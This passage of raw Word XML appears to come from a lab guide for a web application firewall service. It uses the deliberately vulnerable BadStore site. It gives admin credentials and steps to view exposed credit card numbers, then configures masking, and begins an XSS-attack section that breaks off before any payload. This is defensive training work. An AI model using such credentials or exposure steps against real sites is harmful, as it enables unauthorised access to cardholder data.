        <w:t xml:space="preserve">She said something about how we were showing full credit card numbers, and PCI compliance, and threatened legal consequences. What do I do???  I </w:t>
      </w:r>
      <w:r w:rsidR="2681B805">
        <w:rPr/>
        <w:t>do not</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> want to lose my super-cool sales report though, I use that daily to reconcile inventory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="00D140A2" w:rsidRDefault="00D140A2" w14:paraId="5117795C" w14:textId="3DDB2A04">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="16AED19E" w:rsidRDefault="00D140A2" w14:paraId="168AE1F3" w14:textId="5BFAE4BC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidR="62703AE9">
        <w:rPr/>
        <w:t xml:space="preserve">Try for yourself and run through the steps to reproduce what the auditor saw.  Notice if you do follow the flow – you will see credit card information... </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">Look for a </w:t>
      </w:r>
      <w:r w:rsidR="6202FA0C">
        <w:rPr/>
        <w:t xml:space="preserve">WAFaaS </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>component</w:t>
      </w:r>
      <w:r w:rsidR="7E8B19AC">
        <w:rPr/>
        <w:t xml:space="preserve"> which can be used </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="5BDB08D7" w:rsidRDefault="00D140A2" w14:paraId="00345E41" w14:textId="34C7163D">
      <w:pPr/>
      <w:r w:rsidRPr="16AED19E" w:rsidR="6F51F3F0">
        <w:rPr>
          <w:rStyle w:val="Heading4Char"/>
        </w:rPr>
        <w:t>Spoiler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28FAB926" w:rsidP="16AED19E" w:rsidRDefault="28FAB926" w14:paraId="62304786" w14:textId="54AE7351">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="534823F9">
        <w:rPr/>
        <w:t xml:space="preserve">Login to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="534823F9">
        <w:rPr/>
        <w:t>badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="534823F9">
        <w:rPr/>
        <w:t xml:space="preserve"> as admin/secret </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28FAB926" w:rsidP="16AED19E" w:rsidRDefault="28FAB926" w14:paraId="424C2D95" w14:textId="3EF884C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="534823F9">
        <w:rPr/>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink r:id="R20c7eb8b29de41b2">
        <w:r w:rsidRPr="16AED19E" w:rsidR="534823F9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://badstore.cudathon.com/cgi-bin/badstore.cgi?action=admin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="534823F9">
        <w:rPr/>
        <w:t xml:space="preserve">, click “Do It” and view all the credit card numbers. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28FAB926" w:rsidP="16AED19E" w:rsidRDefault="28FAB926" w14:paraId="05B4B943" w14:textId="45C882DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="534823F9">
        <w:rPr/>
        <w:t>In WAF-as-a-Service, a</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>dd the Data Theft Protection component</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="00D140A2" w:rsidRDefault="00D140A2" w14:paraId="2FF2DBD7" w14:textId="0A00B026">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>Click Add Element</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="213B1F81">
        <w:rPr/>
        <w:t xml:space="preserve">Enter </w:t>
      </w:r>
      <w:r w:rsidR="011B064C">
        <w:rPr/>
        <w:t xml:space="preserve">“CC” </w:t>
      </w:r>
      <w:r w:rsidR="30055CE0">
        <w:rPr/>
        <w:t xml:space="preserve">for the name </w:t>
      </w:r>
      <w:r w:rsidR="23E0A8FA">
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> choose Credit Cards for Identity Theft Type</w:t>
      </w:r>
      <w:r w:rsidR="5C674373">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="00D140A2" w:rsidRDefault="00D140A2" w14:paraId="10367F31" w14:textId="13811C62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="1F70B452">
        <w:rPr/>
        <w:t xml:space="preserve">Change Action to “Cloak” </w:t>
      </w:r>
      <w:r w:rsidR="4B9A1D79">
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="1BBA3D76">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidR="14D80F75">
        <w:rPr/>
        <w:t>Save</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2FEF7630" w:rsidP="16AED19E" w:rsidRDefault="2FEF7630" w14:paraId="72A2E68A" w14:textId="645AD06A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2FEF7630">
        <w:rPr/>
        <w:t>Notice “The Spinner” and wait a few minutes for that to complete.</w:t>
      </w:r>
      <w:r w:rsidR="45B1BFE8">
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="50D9FEAE" w:rsidP="699639B3" w:rsidRDefault="50D9FEAE" w14:paraId="218D4DBF" w14:textId="4669008D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2FEF7630">
        <w:rPr/>
        <w:t>After a couple of minutes, r</w:t>
      </w:r>
      <w:r w:rsidR="50D9FEAE">
        <w:rPr/>
        <w:t xml:space="preserve">efresh the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="3D04CBFE">
        <w:rPr/>
        <w:t>badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="3D04CBFE">
        <w:rPr/>
        <w:t xml:space="preserve"> page.  Did it work? </w:t>
      </w:r>
      <w:r w:rsidR="47835B75">
        <w:rPr/>
        <w:t>Any</w:t>
      </w:r>
      <w:r w:rsidR="6A6DAEE0">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2D25C3EB">
        <w:rPr/>
        <w:t xml:space="preserve">credit card numbers </w:t>
      </w:r>
      <w:r w:rsidR="0B164D17">
        <w:rPr/>
        <w:t xml:space="preserve">you see </w:t>
      </w:r>
      <w:r w:rsidR="50D9FEAE">
        <w:rPr/>
        <w:t xml:space="preserve">that are not masked are </w:t>
      </w:r>
      <w:r w:rsidR="136F014C">
        <w:rPr/>
        <w:t>invalid</w:t>
      </w:r>
      <w:r w:rsidR="50D9FEAE">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="744662ED">
        <w:rPr/>
        <w:t xml:space="preserve">not true </w:t>
      </w:r>
      <w:r w:rsidR="1A668983">
        <w:rPr/>
        <w:t>credit card numbers</w:t>
      </w:r>
      <w:r w:rsidR="731C16C5">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3FA12455" w:rsidP="4CBE4E3E" w:rsidRDefault="3FA12455" w14:paraId="52A0D756" w14:textId="2271EC84">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="3FA12455">
        <w:drawing>
          <wp:inline wp14:editId="52716529" wp14:anchorId="096C7697">
            <wp:extent cx="5943600" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2098498550" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R80057c77b73e47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066800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="32F6121D" w:rsidRDefault="699639B3" w14:paraId="2E8C295A" w14:textId="6A75FB0C">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="16AED19E" w:rsidRDefault="699639B3" w14:paraId="1C1D3ABB" w14:textId="3F99F1E4">
      <w:pPr>
        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16AED19E" w:rsidR="37A498E8">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="62925907">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">onsultant </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="37A498E8">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Requested Configuration: Block </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="7212A78D">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XSS Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="79502493">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="16AED19E" w:rsidRDefault="32F6121D" w14:paraId="5C4477FE" w14:textId="40381BCC">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="200" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="864"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16AED19E" w:rsidR="653A558A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">You as the consultant recommend the customer blocks Cross-Site Scripting Attacks.  The customer doesn’t understand </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="70728401">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">what these </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="3F62F374">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">attacks </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="70728401">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="208AE30A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ( </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="70728401">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">even though you </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="4429E29D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">gave </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="70728401">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">them a presentation on </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="0DCC1D8D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the OWASP Top 10 </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="70728401">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">just last </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="70728401">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>week</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="2C2B280F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="653A558A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and wants you to </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="6A5A56E1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">demonstrate </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="653A558A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wh</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="15BF146C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="653A558A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> these are</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="15BF146C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a problem</w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="653A558A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and to prove that the WAF can block these.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="16AED19E" w:rsidRDefault="32F6121D" w14:paraId="5FFF1BCD" w14:textId="33A6EF8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="16AED19E" w:rsidR="161E66FA">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS Attack Creation </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="20FA9A2A">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="16AED19E" w:rsidRDefault="32F6121D" w14:paraId="3A57DCA7" w14:textId="5E892CE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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16AED19E" w:rsidR="20FA9A2A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
